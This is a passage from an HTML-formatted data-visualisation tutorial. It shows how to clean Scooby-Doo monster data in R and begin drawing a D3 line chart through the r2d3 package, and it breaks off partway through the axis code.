a line chart that shows the cumulative total number of monsters caught
by each member of Mystery Incorporated. Then we will add some unique D3
flair to it to make an unusually painful line chart worth it.&lt;/p&gt;
&lt;p&gt;First, you’ll need to install the {r2d3} package as usual.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;r2d3&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This allows you to write D3 in RStudio in two main ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;D3 chunks in an .Rmd file&lt;/li&gt;
&lt;li&gt;A D3 script - a &lt;code&gt;.js&lt;/code&gt; file with some autopopulated D3 code&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/r2d3-options.png" title = "r2d3 options" alt="Options for writing D3 in RStudio using r2d3" style="display: block; margin: auto;" /&gt;
&lt;p&gt;For this blog post, we will be writing our code in a separate .js file,
but we will be running it in an R Markdown chunk to preview it. (It is
also possible to preview your code from the script directly, but
this way will hopefully show you how easily you can include D3
visualisations in an R Markdown report.)&lt;/p&gt;
&lt;p&gt;So, we will start by creating two files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An R Markdown document: &lt;code&gt;scoobydoo.Rmd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;A D3 script: &lt;code&gt;scoobydoo.js&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To ensure that the files are able to interact with each other, I
recommend working in an RStudio project (File &amp;gt; New Project) with both
files at the &lt;code&gt;.Rproj&lt;/code&gt; level.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-r-d3-intro-r2d3"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="data-cleaning-in-r"&gt;Data cleaning in R&lt;/h2&gt;
&lt;p&gt;You will need to install some packages for the cleaning steps, which you
can install with this line of code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;r2d3&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytuesdayR&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In your .Rmd file, you can copy the following steps to load necessary
packages, read in the data, and clean it in preparation of our D3
visualisation. We won’t go through these steps as this blog post assumes
you know R and some basic Tidyverse already! If you don’t, &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;we offer
courses to help you get
started&lt;/a&gt;! You can
download the data we will be using manually from
&lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2021/2021-07-13/scoobydoo.csv" rel="external"&gt;here&lt;/a&gt;
if you prefer reading it in from a CSV file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in scoobydoo.Rmd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# load data from tidytuesday&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tuesdata &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidytuesdayR&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tt_load&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;, week &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scoobydoo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tuesdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;scoobydoo
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# wrangling data into nice shape&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;monsters_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scoobydoo &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(date_aired, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;starts_with&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;caught&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;across&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;starts_with&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;caught&amp;#34;&lt;/span&gt;), &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.logical&lt;/span&gt;(.))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pivot_longer&lt;/span&gt;(cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; caught_fred&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;caught_not,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names_to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;character&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values_to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;monsters_caught&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;(character &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;caught_not&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;caught_other&amp;#34;&lt;/span&gt;))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(date_aired), .keep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;unused&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(character, year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(monsters_caught),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .groups &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;drop_last&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cumulative_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cumsum&lt;/span&gt;(caught),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; character &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(character, &lt;span style="color:#a5d6ff"&gt;&amp;#34;caught_&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; character &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_to_title&lt;/span&gt;(character),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; character &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;recode&lt;/span&gt;(character, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Daphnie&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Daphne&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I recommend investigating the resulting columns of the data by printing
&lt;code&gt;monsters_caught&lt;/code&gt; at this stage, as it will help you better understand
the D3 code later on. You will see that there are 4 columns: &lt;code&gt;character&lt;/code&gt;
which contains the names of our Mystery Inc. members (Daphne, Fred,
Scooby, Shaggy, and Velma); &lt;code&gt;year&lt;/code&gt; which contains years between 1969 and
2021 obtained from when the episode was aired; &lt;code&gt;caught&lt;/code&gt; which contains
how many monsters were caught for each mystery member in each year and
&lt;code&gt;cumulative_caught&lt;/code&gt; which is the cumulative sum of monsters caught for
each member.&lt;/p&gt;
&lt;p&gt;We are going to add a final column which will contain a unique colour
for each character, so that our line chart will look a bit nicer. The
colours are represented by hex codes obtained from official artwork of
the characters.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# setting up colors for each character&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;character_hex &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tribble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; character, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; color,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Fred&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#76a2ca&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Velma&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#cd7e05&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Scooby&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#966a00&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Shaggy&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#b2bb1b&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Daphne&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#7c68ae&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;monsters_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; monsters_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(character_hex, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;character&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will also add a new chunk which includes the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;r2d3&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;r2d3&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; monsters_caught,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; script &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scoobydoo.js&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d3_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;5&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;r2d3()&lt;/code&gt; function lets you communicate with our &lt;code&gt;scoobydoo.js&lt;/code&gt;
script using the &lt;code&gt;monsters_caught&lt;/code&gt; tibble that we’ve created in R. As
our script is currently empty, nothing shows up when you run this line.
After we add some new code to our &lt;code&gt;scoobydoo.js&lt;/code&gt; script we can go back
to &lt;code&gt;scoobydoo.Rmd&lt;/code&gt; and re-run this line to view the output. We are
specifying our D3 version as &lt;code&gt;5&lt;/code&gt; to ensure our code will continue to
work despite potentially breaking updates to D3.&lt;/p&gt;
&lt;h2 id="your-first-lines-of-d3"&gt;Your first lines of D3&lt;/h2&gt;
&lt;p&gt;Okay, let’s add some code to our D3 script. We start by defining
constants for the size of our margins, the plot width and height, and
some font and line sizes for later on. Keeping these constants at the
top makes them easy to find, and changing one updates every size that
depends on it throughout our script.&lt;/p&gt;
&lt;p&gt;Note: Comments in JavaScript are denoted by &lt;code&gt;//&lt;/code&gt;, and variable names are
often written in &lt;code&gt;camelCase&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Another important concept introduced in the code below is
attributes. An SVG element has a number of properties and these can be
set as attributes. For example, here we are setting the width attribute
of the SVG as the width of our (upcoming) plot plus the left and the
right margin (white space around the plot). Finally, we set up a group
that will represent the plot inside our SVG element, and then move this
plot to start where the left and top margin end using the “transform”
attribute.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// in scoobydoo.js
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set up constants used throughout script
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {top&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;80&lt;/span&gt;, right&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, bottom&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;, left&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.right
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.bottom
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; lineWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; mediumText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; bigText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;28&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set width and height of svg element (plot + margin)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;svg.attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;width&amp;#34;&lt;/span&gt;, plotWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.right)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;height&amp;#34;&lt;/span&gt;, plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.bottom)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// create plot group and move it
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; plotGroup &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; svg.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;transform&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;translate(&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we run our &lt;code&gt;r2d3()&lt;/code&gt; line in R Markdown again, the output is still
empty, but if we right-click on the space below our chunk and click
“Inspect Element”, we can now see that there is indeed an SVG element
(everything inside the SVG tags &lt;code&gt;&amp;lt;svg&amp;gt; &amp;lt;/svg&amp;gt;&lt;/code&gt;), with the width and
height that we’ve provided in the SVG attributes. Getting comfortable
with using either the RStudio Developer Tools to inspect the element, or
inspecting it in a browser, will help you more easily understand D3
visualisations.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/inspect-element.png" title = "Inspect element" alt="Using 'Inspect Element' to better understand your code" style="display: block; margin: auto;" /&gt;
&lt;h2 id="adding-axes"&gt;Adding axes&lt;/h2&gt;
&lt;p&gt;Next, let’s create some axes. At the bottom of &lt;code&gt;scoobydoo.js&lt;/code&gt;,
add the following lines, which define two functions,
&lt;code&gt;xAxis&lt;/code&gt; and &lt;code&gt;yAxis&lt;/code&gt;. These will be used to scale our data to a
coordinate system.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// x-axis values to year range in data
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// x-axis goes from 0 to width of plot
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; xAxis &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.scaleLinear()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .domain(d3.extent(data, d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.year; }))
